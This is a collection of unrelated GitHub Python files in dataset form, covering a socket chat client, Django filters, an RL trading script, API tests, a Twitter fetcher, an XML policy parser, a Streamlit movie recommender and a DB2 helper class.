self.lbl_login_error.config(text=\"Error: Name already exist!\")\n self.lbl_login_error.place(\n relx=0.35,\n rely=0.33)\n return\n # Set new client_list and create_group_list\n self.client_list = response_object[\"data\"]\n self.create_group_list = response_object[\"group_data\"]\n print(\"client_list : \", self.client_list)\n print(\"created_group : \", self.create_group_list)\n # Set Variable\n self.combobox_home_client.config(values=self.client_list)\n self.combobox_home_group.config(values=self.create_group_list)\n\n # Crate new chat for unexist chat\n for user in response_object[\"data\"]:\n if (user not in self.client_chats):\n self.client_chats[user] = \"\"\n # Hide Login Window\n if (self.current_window == \"login\"):\n self.login.withdraw()\n self.home.deiconify()\n\n def handle_receive_direct_message(self, response_object):\n self.insert_message(\n response_object[\"sender\"], response_object[\"data\"])\n\n def handle_receive_group_message(self, response_object):\n print(\"Received group message\", response_object)\n self.insert_message(\n response_object[\"sender\"], response_object[\"data\"], group_name=response_object[\"group\"], is_group=True)\n\n def handle_receive_groups(self, response_object):\n if response_object[\"isExist\"] and not response_object[\"isJoin\"]:\n self.create_group_list = response_object[\"data\"]\n print(\"created_group : \", self.create_group_list)\n self.combobox_home_group.config(values=self.create_group_list)\n\n # Crate new chat for unexist chat\n for group in response_object[\"data\"]:\n if (group not in self.join_group_chats):\n self.join_group_chats[group] = \"\"\n elif response_object[\"isExist\"] and response_object[\"isJoin\"]:\n self.join_group_list = response_object[\"data\"]\n\n # Add message to text box\n\n def insert_message(self, sender, message, me=False, group_name=\"None\", is_group=False):\n now = datetime.now().strftime(\"%H:%M:%S\")\n # Create Message depends on is that myself\n if (me):\n message = now+\" \"+sender+\"(me) : \"+message+\"\\n\\n\"\n else:\n message = now+\" \"+sender+\" : \"+message+\"\\n\\n\"\n\n if is_group:\n if (group_name == self.current_group_chat) or me:\n self.txt_root_message.config(state=NORMAL)\n self.txt_root_message.insert(END, message)\n self.txt_root_message.config(state=DISABLED)\n self.txt_root_message.see(END)\n return\n self.join_group_chats[group_name] = self.join_group_chats[group_name] + message\n return\n # Insert Message to current text box\n if (sender == self.current_client_chat) or me:\n self.txt_root_message.config(state=NORMAL)\n self.txt_root_message.insert(END, message)\n self.txt_root_message.config(state=DISABLED)\n self.txt_root_message.see(END)\n return\n # Insert Message to stored chat\n self.client_chats[sender] = self.client_chats[sender] + message\n\n # Change Text Box\n def swap_stored_chat(self, old_recipient, new_recipient, is_group=False):\n # Insert new chat\n self.txt_root_message.config(state=NORMAL)\n self.txt_root_message.delete(\"1.0\", END)\n if is_group:\n self.txt_root_message.insert(\n END, self.join_group_chats[new_recipient])\n else:\n self.txt_root_message.insert(\n END, self.client_chats[new_recipient])\n self.txt_root_message.config(state=DISABLED)\n self.txt_root_message.see(END)\n # Set current chat and sub text\n if is_group:\n self.current_group_chat = new_recipient\n self.lbl_root_sub_head.config(\n text=\"G.\"+self.current_group_chat+\" Chat room\")\n else:\n self.current_client_chat = new_recipient\n self.lbl_root_sub_head.config(\n text=\"Chat room with \"+new_recipient)\n\n def change_is_group(self, is_group):\n self.is_group = is_group\n\n # thread function\n def receive(self):\n while self.isStart:\n try:\n responseJSON = client.recv(1024).decode()\n self.on_receive(json.loads(responseJSON))\n\n except Exception as e:\n # an error will be printed on the command line or console if there's an error\n print(\"Error has occured\", e)\n break\n\n # End Class\n\n\n# create a GUI class object\napp = GUI()\n","repo_name":"S1xZ/SocketChatApplication","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":20843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3453947937","text":"\n\nfrom django import template\nfrom datetime import date, timedelta\n\nregister = template.Library()\n\n@register.filter(name='get_due_date_string')\ndef get_due_date_string(value):\n # print(f\"get_due_date_string{value}\")\n month={1:\"Jan\",2:\"Feb\",3:\"Mar\",4:\"Apr\",5:\"May\",6:\"June\",7:\"Jul\",8: \"Aug\",9:\"Sept\",10:\"Oct\", 11:\"Nov\",12:\"Dec\"}\n delta = date.today() - value \n \n\n if delta.days == 0:\n return \"Today\"\n \n elif delta.days == 1:\n return \"1 day ago\"\n elif delta.days > 1 and delta.days < 8:\n return \"%s %s ago\" % (abs(delta.days),\n (\"day\" if abs(delta.days) == 1 else \"days\"))\n else:\n today = date.today()\n \n if value.year == today.year:\n return f\"{month[value.month]} {value.day}\"\n else:\n value\n\n return value\n # elif delta.days > 1:\n # return \"In %s days\" % delta.days\n@register.filter(name='convert_option')\ndef convert_option(value):\n \n TX_PAYMENT,TX_LOAN_PAYMENT,TX_VENTURE,TX_TRANSACTION,TX_DEPOSIT,TX_WITHRAWAL,TX_GROCERY,TX_SERVICES=(0,1,2,3,4,5,6,7)\n cat ={TX_TRANSACTION:\"REGULAR TRANSACTION\",TX_PAYMENT:\"PAYMENT\",TX_VENTURE:\"VENTURE\",TX_DEPOSIT:\"DEPOSIT\",TX_WITHRAWAL:'WITHRAWAL',TX_GROCERY:'GROCERY',TX_SERVICES:'SERVICES',TX_LOAN_PAYMENT:\"LOAN PAYMENT\"}\n \n return cat.get(value)","repo_name":"dandybermillo/tryjango","sub_path":"fx/templatetags/app_filters.py","file_name":"app_filters.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6611074505","text":"\nimport pandas as pd\nimport numpy as np\nimport time,datetime\nimport datetime\nimport os\n\n\n# RL models from stable-baselines\nimport gym\nfrom stable_baselines import A2C\nfrom stable_baselines.common.policies import MlpPolicy\nfrom stable_baselines.common.noise import NormalActionNoise, OrnsteinUhlenbeckActionNoise, AdaptiveParamNoiseSpec\nfrom stable_baselines.common.vec_env import DummyVecEnv\n\n\nfrom env.Train_Env import Train_Env\nfrom env.Val_Env import Val_Env\nfrom env.Trading_Env import Trading_Env\n\n\ndef train_A2C(env_train, model_name, timesteps=25000):\n \"\"\"A2C model\"\"\"\n\n start = time.time()\n model = A2C('MlpPolicy', env_train, verbose=0)\n model.learn(total_timesteps=timesteps)\n end = time.time()\n\n\n now = datetime.datetime.now()\n TRAINED_MODEL_DIR = f\"trained_models/{now}\"\n\n model.save(f\"{TRAINED_MODEL_DIR}/{model_name}\")\n print('Training time (A2C): ', (end - start) / 60, ' minutes')\n return model\n\n\n\n\n\ndef RL_Trading_Prediction(df,model,name,last_state,iter_num, unique_trade_date,rebalance_window,turbulence_threshold,initial):\n \n\n \n start=unique_trade_date[iter_num - rebalance_window]\n end=unique_trade_date[iter_num]\n trade_data = df[(df.datadate >= start) & (df.datadate < end)]\n trade_data = trade_data.sort_values(['datadate','tic'],ignore_index=True)\n trade_data.index = trade_data.datadate.factorize()[0]\n \n env_trade = DummyVecEnv([lambda: Trading_Env(trade_data,\n turbulence_threshold=turbulence_threshold,\n initial=initial,\n previous_state=last_state,\n model_name=name,\n iteration=iter_num)])\n obs_trade = env_trade.reset()\n \n\n for i in range(len(trade_data.index.unique())):\n action, _states = model.predict(obs_trade)\n obs_trade, rewards, dones, info = env_trade.step(action)\n if i == (len(trade_data.index.unique()) - 2):\n last_state = env_trade.render()\n\n df_last_state = pd.DataFrame({'last_state': last_state})\n df_last_state.to_csv('results/last_state_{}_{}.csv'.format(name, i), index=False)\n \n return last_state\n\n\ndef RL_Trading_Val(model, test_data, test_env, test_obs) -> None:\n \n for i in range(len(test_data.index.unique())):\n action, _states = model.predict(test_obs)\n test_obs, rewards, dones, info = test_env.step(action)\n\n\ndef get_validation_sharpe(iteration):\n \n \n df_total_value = pd.read_csv('results/portfolio_value_validation_{}.csv'.format(iteration), index_col=0)\n df_total_value.columns = ['account_value_train']\n df_total_value['daily_return'] = df_total_value.pct_change(1)\n sharpe = (4 ** 0.5) * df_total_value['daily_return'].mean() / df_total_value['daily_return'].std()\n return sharpe\n\n\ndef trading_policy(df, unique_trade_date, rebalance_window, validation_window) -> None:\n \n\n last_state = []\n\n \n a2c_sharpe_list = []\n\n model_use = []\n \n # Determine the turbulence_threshold from 2009 - 2020\n\n \n insample_turbulence = df[(df.datadate<20151000) & (df.datadate>=20090000)]\n insample_turbulence = insample_turbulence.drop_duplicates(subset=['datadate'])\n \n insample_turbulence_threshold = np.quantile(insample_turbulence.turbulence.values, .90)\n\n start = time.time()\n for i in range(rebalance_window + validation_window, len(unique_trade_date), rebalance_window):\n print(\"============================================\")\n ## initial state is empty\n if i - rebalance_window - validation_window == 0:\n # inital state\n initial = True\n else:\n # previous state\n initial = False\n\n # Tuning trubulence index based on historical data\n # Turbulence lookback window is one quarter\n \n end_date_index = df.index[df[\"datadate\"] == unique_trade_date[i - rebalance_window - validation_window]].to_list()[-1]\n start_date_index = end_date_index - validation_window*30 + 1\n\n historical_turbulence = df.iloc[start_date_index:(end_date_index + 1), :]\n \n\n historical_turbulence = historical_turbulence.drop_duplicates(subset=['datadate'])\n\n historical_turbulence_mean = np.mean(historical_turbulence.turbulence.values)\n\n if historical_turbulence_mean > insample_turbulence_threshold:\n \n turbulence_threshold = insample_turbulence_threshold\n else:\n \n turbulence_threshold = np.quantile(insample_turbulence.turbulence.values, 1)\n \n print(\"turbulence_threshold: \", turbulence_threshold)\n\n \n # Training Setting \n \n\n train_start = 20090000\n train_end = unique_trade_date[i - rebalance_window - validation_window]\n train = df[(df.datadate >= train_start) & (df.datadate < train_end)]\n train = train.sort_values(['datadate','tic'],ignore_index=True)\n train.index = train.datadate.factorize()[0]\n \n env_train = DummyVecEnv([lambda: Train_Env(train)])\n\n # Validation Setting\n\n val_start = unique_trade_date[i - rebalance_window - validation_window]\n val_end = unique_trade_date[i - rebalance_window]\n validation = df[(df.datadate >= val_start) & (df.datadate < val_end)]\n validation = validation.sort_values(['datadate','tic'],ignore_index=True)\n validation.index = validation.datadate.factorize()[0]\n\n \n env_val = DummyVecEnv([lambda: Val_Env(validation,\n turbulence_threshold=turbulence_threshold,\n iteration=i)])\n obs_val = env_val.reset()\n \n \n \n # Training \n print(\"======Model training from: \", 20090000, \"to \",\n unique_trade_date[i - rebalance_window - validation_window])\n \n print(\"======A2C Training========\")\n model_a2c = train_A2C(env_train, model_name=\"A2C_30k_dow_{}\".format(i), timesteps=30000)\n print(\"======A2C Validation from: \", unique_trade_date[i - rebalance_window - validation_window], \"to \",\n unique_trade_date[i - rebalance_window])\n RL_Trading_Val(model=model_a2c, test_data=validation, test_env=env_val, test_obs=obs_val)\n sharpe_a2c = get_validation_sharpe(i)\n print(\"A2C Sharpe Ratio: \", sharpe_a2c)\n\n \n \n a2c_sharpe_list.append(sharpe_a2c)\n model= model_a2c\n \n \n # Trading\n\n print(\"======Trading from: \", unique_trade_date[i - rebalance_window], \"to \", unique_trade_date[i])\n #print(\"Used Model: \", model_ensemble)\n last_state = RL_Trading_Prediction(df=df, model=model, name=\"A2C\",\n last_state=last_state, iter_num=i,\n unique_trade_date=unique_trade_date,\n rebalance_window=rebalance_window,\n turbulence_threshold=turbulence_threshold,\n initial=initial)\n \n \n\n end = time.time()\n print(\"A2C Trading Strategy Time: \", (end - start) / 60, \" minutes\")\n","repo_name":"Pyligent/RL_Algo_Trading","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3925706583","text":"import re\n\n\nRE_PERSON_URL = re.compile(\n r\"^/pessoas/[\\d\\w]{8}-[\\d\\w]{4}-[\\d\\w]{4}-[\\d\\w]{4}-[\\d\\w]{12}\"\n)\n\n\ndef test_create_person(client):\n persons = [\n {\n \"apelido\": \"josé\",\n \"nome\": \"José Roberto\",\n \"nascimento\": \"2000-10-01\",\n \"stack\": [\"C#\", \"Node\", \"Oracle\"],\n },\n {\n \"apelido\": \"ana\",\n \"nome\": \"Ana Barbosa\",\n \"nascimento\": \"1985-09-23\",\n \"stack\": None,\n },\n ]\n for person in persons:\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 201\n location = response.headers[\"Location\"]\n assert RE_PERSON_URL.match(location) is not None\n\n\ndef test_create_person_duplicated_person(client):\n # caso \"josé\" já tenha sido criado em outra requisição\n person = {\n \"apelido\": \"josé\",\n \"nome\": \"José Roberto\",\n \"nascimento\": \"2000-10-01\",\n \"stack\": [\"C#\", \"Node\", \"Oracle\"],\n }\n\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 201\n location = response.headers[\"Location\"]\n assert RE_PERSON_URL.match(location) is not None\n\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 422\n\n\ndef test_create_person_empty_fields(client):\n persons = [\n {\n \"apelido\": \"ana\",\n \"nome\": None, # não pode ser None\n \"nascimento\": \"1985-09-23\",\n \"stack\": None,\n },\n {\n \"apelido\": None, # não pode ser None\n \"nome\": \"Ana Barbosa\",\n \"nascimento\": \"1985-01-23\",\n \"stack\": None,\n },\n ]\n for person in persons:\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 422\n\n\ndef test_create_person_invalid_payload(client):\n persons = [\n {\n \"apelido\": \"apelido\",\n \"nome\": 1, # nome deve ser string e não número\n \"nascimento\": \"1985-01-01\",\n \"stack\": None,\n },\n {\n \"apelido\": \"apelido\",\n \"nome\": \"nome\",\n \"nascimento\": \"1985-01-01\",\n \"stack\": [1, \"PHP\"], # stack deve ser um array de apenas strings\n },\n ]\n for person in persons:\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 400\n","repo_name":"RonaldTheodoro/desafio-rinha-de-backend-2023","sub_path":"tests/test_create_person.py","file_name":"test_create_person.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33145390528","text":"import tweepy\nimport json\nimport pandas as pd\nimport os\nimport datetime\n\nfolder_path = \"./twitterdata/\"\n\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_token_secret = ''\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\ndef update_timeline(username):\n user = username\n print(user)\n profile_image = ''\n user_timeline = api.user_timeline(id=user)\n tweet_df = pd.DataFrame([], columns=['id', 'isRT', 'time', 'lang', 'text'])\n for index in range(0, len(user_timeline)):\n status = user_timeline[index]\n json_str = json.dumps(status._json)\n tweet = json.loads(json_str)\n isRT = 'RT @' in tweet['text']\n tweet_id = tweet['id']\n tweet_time = tweet['created_at']\n d = datetime.datetime.strptime(tweet_time, '%a %b %d %H:%M:%S %z %Y')\n tweet_time = d.strftime('%d.%m.%Y %H:%M:%S')\n lang = tweet['lang']\n tweet_text = tweet['text']\n tweet_info = [tweet_id, isRT, tweet_time, lang, tweet_text]\n profile_image = tweet['user']['profile_image_url']\n if os.path.isfile(folder_path + user + \"_timeline.csv\"):\n tweet_df = pd.read_csv(folder_path + user + \"_timeline.csv\")\n if tweet_id not in tweet_df['id'].values:\n tweet_df.loc[len(tweet_df)] = tweet_info\n tweet_df.to_csv(folder_path + user + \"_timeline.csv\", index=False)\n else:\n tweet_df.loc[len(tweet_df)] = tweet_info\n tweet_df.to_csv(folder_path + user + \"_timeline.csv\", index=False)\n\n print(len(tweet_df.index) < 2)\n return profile_image\n","repo_name":"halukenes/MovietterAPI","sub_path":"twitterAPI_s.py","file_name":"twitterAPI_s.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24436601496","text":"__author__ = 'jgevirtz'\nimport random\nfrom transactional.structures import Set\nfrom transactional.core import Transaction\nfrom unittest import TestCase\n\nclass TestSetBasic(TestCase):\n def test_uniqueness(self):\n \"\"\"\n Make sure the set itself works\n \"\"\"\n s1 = Set()\n s1.add(1)\n s1.add(1)\n s1.add(2)\n\n s2 = Set()\n s2.add(1)\n s2.add(2)\n assert s1 == s2\n\n def test_init(self):\n s1 = Set([1, 2, 3, 3])\n s2 = Set()\n s2.add(1)\n s2.add(1)\n s2.add(2)\n s2.add(3)\n s2.add(3)\n\n assert s1 == s2\n\n def test_remove(self):\n s1 = Set([0, 1, 2, 3, 4])\n s = {0, 1, 2, 3, 4}\n for i in range(5):\n s1.remove(i)\n s.remove(i)\n assert s1 == Set(s)\n\n def test_iter(self):\n s = Set([0, 1, 2, 3, 4, 5])\n assert [i for i in s] == [i for i in range(6)]\n\n def test_diff(self):\n s1 = Set([0, 1, 2, 3, 4])\n s2 = Set([2, 3])\n s3 = Set([0, 1, 4])\n assert (s1 - s2) == s3\n\n def test_intersection(self):\n s1 = Set([0, 1, 2])\n s2 = Set([0, 2, 3, 4])\n s3 = Set([0, 2])\n assert (s1 & s2) == s3\n\n def test_union(self):\n s1 = Set([0, 1, 2])\n s2 = Set([3, 4, 5])\n s3 = Set(i for i in range(6))\n\n assert (s1 | s2) == s3\n\n\nclass TestSetTransactional(TestCase):\n def setUp(self):\n random.seed(1987)\n\n def test(self):\n s = Set()\n with Transaction() as t1:\n for i in range(1000):\n s.add(random.randint(0, 50))\n s_copy1 = Set(s)\n\n with Transaction() as t2:\n for i in range(1000):\n s.add(random.randint(0, 50))\n s_copy2 = Set(s)\n\n t2.undo()\n assert s == s_copy1\n\n t2.do()\n assert s == s_copy2\n\n t2.undo()\n t1.undo()\n\n assert s == Set()\n\n","repo_name":"joshgev/transactional","sub_path":"transactional/test/testSet.py","file_name":"testSet.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"36360787877","text":"__author__ = 'Willem Elbers (MPI-TLA) , \\\n Claudio Cacciari (Cineca) '\nimport json\nimport hashlib\nimport logging\nimport logging.handlers\nfrom lxml import etree\nimport requests\nfrom ReplicationPolicy import *\n\n\n\"\"\"\n PolicyParser Class\n Class which manages the parsing of all the policy elements\n\"\"\"\nclass PolicyParser():\n\n def __init__(self, type='', test=False, loggerParentName=None, debug=False):\n\n if loggerParentName: loggerName = loggerParentName + \".PolicyParser\"\n else: loggerName = \"PolicyParser\"\n self.logger = logging.getLogger(loggerName)\n self.loggerName = loggerName\n\n if debug:\n self.logger.setLevel(logging.DEBUG)\n else:\n self.logger.setLevel(logging.INFO)\n\n self.type = type\n self.test = test\n self.debug = debug\n self.dpmNS = '{http://eudat.eu/2013/policy}'\n self.policy = None\n\n def parseXmlSchemaFromUrl(self, url):\n\n self.logger.debug('Parsing xml schema from url ' + url)\n\n response = urllib2.urlopen(url)\n xmlData = response.read()\n schemaDoc = etree.fromstring(xmlData)\n response.close()\n return schemaDoc\n\n def parseXmlSchema(self, schemaurl, schemapath):\n\n if schemaurl and schemaurl[0]:\n self.logger.debug('xml schema URL: ' + schemaurl[0])\n xmlSchemaDoc = self.parseXmlSchemaFromUrl(schemaurl[0])\n elif schemapath and schemapath[0]:\n self.logger.debug('xml schema path: ' + schemapath[0])\n xmlSchemaDoc = etree.parse(schemapath[0])\n else:\n self.logger.debug('xml schema is None')\n xmlSchemaDoc = None\n return xmlSchemaDoc\n\n def parseFromText(self, xmlData, xmlSchemaDoc):\n \"\"\"\n Create an xml document from text input\n \"\"\"\n\n self.logger.debug('Parsing xml doc from text')\n xmlschema = etree.XMLSchema(xmlSchemaDoc)\n root = etree.fromstring(xmlData)\n errMsg = self.validate(xmlschema, root)\n if errMsg is not None:\n return errMsg\n self.parse(root)\n return None\n\n def parseFromFile(self, file, xmlSchemaDoc):\n \"\"\"\n Create an xml document from file input\n \"\"\"\n\n self.logger.debug('Parsing xml doc from file ' + file)\n xmlschema = etree.XMLSchema(xmlSchemaDoc)\n tree = etree.parse(file)\n root = tree.getroot()\n errMsg = self.validate(xmlschema, root)\n if errMsg is not None:\n return errMsg \n self.parse(root)\n return None\n\n def validate(self, xmlschema, root):\n \"\"\"\n Validate an xml document\n \"\"\"\n\n if not xmlschema(root):\n self.logger.error(xmlschema.error_log.last_error)\n errorMessage = xmlschema.error_log.last_error.message\n if errorMessage.startswith(\"Element '{{}}time'\".format(self.dpmNS)):\n return self.timeErrorManager(root, xmlschema)\n else:\n return str(xmlschema.error_log.last_error)\n else:\n return None\n\n def parseFromUrl(self, url, xmlSchemaDoc, conn,\n checksum_algo=None, checksum_value=None):\n \"\"\"\n Create an xml document from url input\n \"\"\"\n\n xmlData = conn.getDocumentByUrl(url)\n\n #Decide if checksum verification is needed and if yes, compute the checksum for the downloaded policy\n checksumVerificationNeeded = not checksum_algo == None\n checksumVerified = False\n if checksumVerificationNeeded:\n self.logger.debug('Checksum computation: '),\n checksumVerification = False\n if checksum_algo.lower() == 'md5':\n self.logger.debug('md5')\n newChecksumValue = hashlib.md5(xmlData.encode()).hexdigest()\n checksumVerified = newChecksumValue == checksum_value\n self.logger.debug('checksum computed %s read %s' % \\\n (newChecksumValue, checksum_value))\n\n #Parse the policy if checksum verification is needed\n self.logger.debug('Checksum verification: ')\n if checksumVerificationNeeded and checksumVerified:\n self.logger.debug('passed')\n return self.parseFromText(xmlData, xmlSchemaDoc)\n elif not checksumVerificationNeeded:\n self.logger.debug('disabled')\n return self.parseFromText(xmlData, xmlSchemaDoc)\n else:\n self.logger.error('failed')\n return 'Checksum verification: failed'\n\n\n def parse(self, policy):\n \"\"\"\n Parse the policy\n \"\"\"\n\n if policy == None or not policy.tag == self.dpmNS+'policy':\n self.logger.error('Failed to find policy element')\n else:\n self.policy = ReplicationPolicy(policy, self.dpmNS, self.loggerName,\n self.debug)\n self.policy.parse()\n\n def timeErrorManager(self, root, xmlschema):\n \"\"\"\n Manage the extra year field in the time element\n \"\"\"\n\n self.logger.debug('trying to fix year extra field in time element')\n timeElemList = root.xpath('//b:time',\n namespaces={'b':self.dpmNS})\n for timeElem in timeElemList:\n self.logger.debug('Element: ' + etree.tostring(timeElem))\n if len(timeElem.text.split()) < 6:\n self.logger.debug('Adding missing field year')\n timeElem.text = timeElem.text + ' *'\n if not xmlschema(root):\n self.logger.error(xmlschema.error_log.last_error)\n return str(xmlschema.error_log.last_error)\n else:\n self.logger.debug('Impossible to fix the error')\n return 'Element: ' + etree.tostring(timeElem) + ' is wrong'\n return None\n","repo_name":"EUDAT-B2SAFE/B2SAFE-DPM","sub_path":"client/cmd/PolicyParser.py","file_name":"PolicyParser.py","file_ext":"py","file_size_in_byte":5941,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72112588007","text":"# using streamlit to create a web app for movie recommendation system\n\nimport streamlit as st\nimport pandas as pd\nimport pickle\nimport requests\n\n# creating a function to fetch the poster path of the movie using the movie_id\n\ndef fetch_poster(movie_id):\n \n data = requests.get(\"https://api.themoviedb.org/3/movie/{}?api_key=6aa58baed4ff4058098e0d3f90d4112b&language=en-US\".format(movie_id))\n data = data.json()\n poster_path = data['poster_path']\n full_path = \"https://image.tmdb.org/t/p/w500/\" + poster_path\n return full_path\n\n# creating a function to recommend movies\ndef recommend(movie):\n # getting the index of the movie\n movie_index = movies_list[movies_list['title'] == movie].index[0]\n \n # getting the similarity scores of all movies with that movie\n # enumerate() is used to combine the index of the movie along with the similarity score\n similar_movies = list(enumerate(similarity[movie_index]))\n \n # sorting the list of similar movies in descending order\n sorted_similar_movies = sorted(similar_movies, key = lambda x:x[1], reverse = True)\n \n # getting the top 5 similar movies\n top_5_similar_movies = sorted_similar_movies[1:6]\n \n # creating recommended list\n recommended = []\n movie_id = []\n # printing the top 5 similar movies\n for i in range(len(top_5_similar_movies)):\n # fetching movie_id\n movie_id.append(movies_list['movie_id'][top_5_similar_movies[i][0]])\n recommended.append(movies_list['title'][top_5_similar_movies[i][0]])\n \n return recommended, movie_id\n\n\n# loading the similarity matrix\n\nsimilarity = pickle.load(open('similarity.pkl', 'rb'))\n\n# loading movies list from movies.pkl file\n\nmovies_list = pickle.load(open('movies.pkl', 'rb'))\n\n# accessing the title of movies\n\ntitles = movies_list['title'].values\n\n# creating a title for the web app\nst.title('Movie Recommendation System')\n\n# creating a selectbox to select a movie\noption = st.selectbox('Select a movie', titles)\n\n# adding button to select the movie\n\nif st.button('Recommend'):\n st.write('Top 5 Similar Movies')\n \n rcd, ids = recommend(option)\n # fetching the poster path of the movie_id in ids\n # and displaying the poster along with the movie title collected wise\n col1, col2, col3, col4, col5 = st.columns(5)\n \n with col1:\n st.text(rcd[0].title()) # converting the first letter of the movie to capital\n st.image(fetch_poster(int(ids[0]))) # converting the string to integer and passing it to the function to fetch the poster path\n \n with col2:\n st.text(rcd[1].title())\n st.image(fetch_poster(int(ids[1])))\n \n with col3:\n st.text(rcd[2].title())\n st.image(fetch_poster(int(ids[2])))\n \n with col4:\n st.text(rcd[3].title())\n st.image(fetch_poster(int(ids[3])))\n \n with col5:\n st.text(rcd[4].title())\n st.image(fetch_poster(int(ids[4])))","repo_name":"CoolGenius-123/Movies-Recomendation-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13884554681","text":"from __future__ import absolute_import\nfrom ctypes import c_void_p, create_string_buffer, addressof, cast, c_char, byref, c_char_p\n\nimport sys\nimport os\nimport platform\n\nfrom .cli_test_db2ApiDef import (POINTER_T)\nfrom . import db2_clu_constants\nfrom .cli_test_db2ApiDef import (sqlca)\nfrom utils.logconfig import mylog\nfrom sqlcodes import SQL_RC_OK\nfrom .db2_cli_constants import (SQL_NTS, SQL_HANDLE_STMT, SQL_HANDLE_DBC, SQL_COMMIT)\n\n__all__ = ['Common_Class']\n__docformat__ = 'reStructuredText en'\n\nclass Common_Class(object):\n \"\"\"common class to facilitate to all cli_test classes helper functions\n\n Attributes\n ----------\n mDb2_Cli : :class:`cli_object.Db2_Cli`\n hstmt : :class:`ctypes.c_void_p`\n \"\"\"\n\n def __init__(self, mDb2_Cli):\n self.mDb2_Cli = mDb2_Cli\n self.hstmt = c_void_p(None)\n\n def setParameterInt(self, index, token, in_int, flags=0):\n \"\"\"helper function to fill an integer parameter\n\n Parameters\n ----------\n index : :obj:`int`\n token : :class:`ctypes.c_uint32`\n in_int : :class:`ctypes.c_int`\n flags : :obj:`int`\n\n \"\"\"\n self.setParameter_int(self.cfgParameters[index], token, in_int, flags)\n\n def setParameter(self, cfgParameter, token, flags=0):\n \"\"\"helper function to fill an string parameter\n\n Parameters\n ----------\n\n cfgParameter : :class:`db2ApiDef.db2CfgParam`\n token : :class:`ctypes.c_uint32`\n flags : 0 or db2CfgParamAutomatic or db2CfgParamComputed or db2CfgParamManual\n \"\"\"\n cfgParameter.flags = flags\n cfgParameter.ptrvalue = create_string_buffer(255) #c_char * 65\n cfgParameter.token = token\n\n def setParameterString(self, cfgParameter, token, paramter_value):\n \"\"\"helper function to fill an string parameter to cfgParameter\n\n Parameters\n ----------\n\n cfgParameters : :class:`db2ApiDef.struct_db2CfgParam`\n token : :class:`ctypes.c_uint32`\n parameter_value : :obj:`str`\n \"\"\"\n cfgParameter.flags = 0\n cfgParameter.ptrvalue = create_string_buffer(paramter_value) #c_char * 65\n cfgParameter.token = token\n\n def encode_utf8(self, s):\n if s is None:\n return \"None\"\n\n if isinstance(s, int):\n return \"%d\" % s\n\n if isinstance(s, float):\n return \"%f\" % s\n\n if sys.version_info > (3,):\n #mylog.info(\"type %s\" % type(s))\n if isinstance(s, bytes):\n return s.decode('utf-8', 'ignore')\n else:\n return s.encode('utf-8', 'ignore')\n else:\n return s\n\n def InstanceAttach(self):\n \"\"\"helper function to attach db2 instance\"\"\"\n _sqlca = sqlca()\n rc = self.mDb2_Cli.libcli64.sqleatin_api(self.mDb2_Cli.nodeName,\n self.mDb2_Cli.user,\n self.mDb2_Cli.pswd,\n byref(_sqlca))\n if rc != SQL_RC_OK:\n mylog.error(\"InstanceAttach %s\" % _sqlca)\n self.get_sqlca_errormsg(_sqlca)\n\n elif _sqlca.sqlcode != SQL_RC_OK:\n mylog.error(\"InstanceAttach '%s'\" % _sqlca)\n self.get_sqlca_errormsg(_sqlca)\n\n else:\n mylog.debug(\"Attach SQL_RC_OK \")\n\n return rc\n\n def get_sqlstate_message(self, SQLSTATE):\n \"\"\"helper function to get a string error text from SQLSTATE number\n uses sqlogstt : Retrieves the message text associated with an SQLSTATE. \n \"\"\"\n # get SQLSTATE message\n psqlstateMsg = create_string_buffer(1024+1)\n rc = self.mDb2_Cli.libcli64.sqlogstt(byref(psqlstateMsg), 1024, 80, SQLSTATE)\n if (rc > 0):\n mylog.error(\"SQLSTATE errorMsg : '%s'\" % psqlstateMsg.value)\n else:\n mylog.warning(\"collecting SQLSTATE errorMsg returned an error rc = %d\" % rc)\n\n def get_sqlca_errormsg(self, _sqlca):\n \"\"\"helper function to get error message from sqlca\n uses sqlaintp : Retrieves the message associated with an error condition \n specified by the sqlcode field of the sqlca structure. \n\n Parameters\n ----------\n _sqlca : :class:`db2ApiDef.sqlca`\n \"\"\"\n # get error message\n perrorMsg = c_char_p(self.encode_utf8(\" \") * 1025)\n pMsgFileName = c_char_p(self.encode_utf8(\"db2sql.mo\"))\n\n rc = self.mDb2_Cli.libcli64.sqlaintp_api(perrorMsg, 1024, 80, pMsgFileName, byref(_sqlca))\n mylog.debug(\"rc = %d\" % rc)\n if rc > 0:#> number indicating the number of bytes in the formatted message\n sqlstate = self.encode_utf8(_sqlca.sqlstate).rstrip()\n mylog.debug(\"_sqlca.sqlstate '%s'\" % sqlstate)\n if sqlstate != '':\n mylog.error(\"\"\"\nerrorMsg : '%s'\nsqlca.sqlstate : '%s'\n\"\"\" % (\n self.encode_utf8(perrorMsg.value),\n sqlstate))\n self.get_sqlstate_message(_sqlca.sqlstate)\n else:\n mylog.error(\"\"\"\nerrorMsg : '%s'\n\"\"\" % 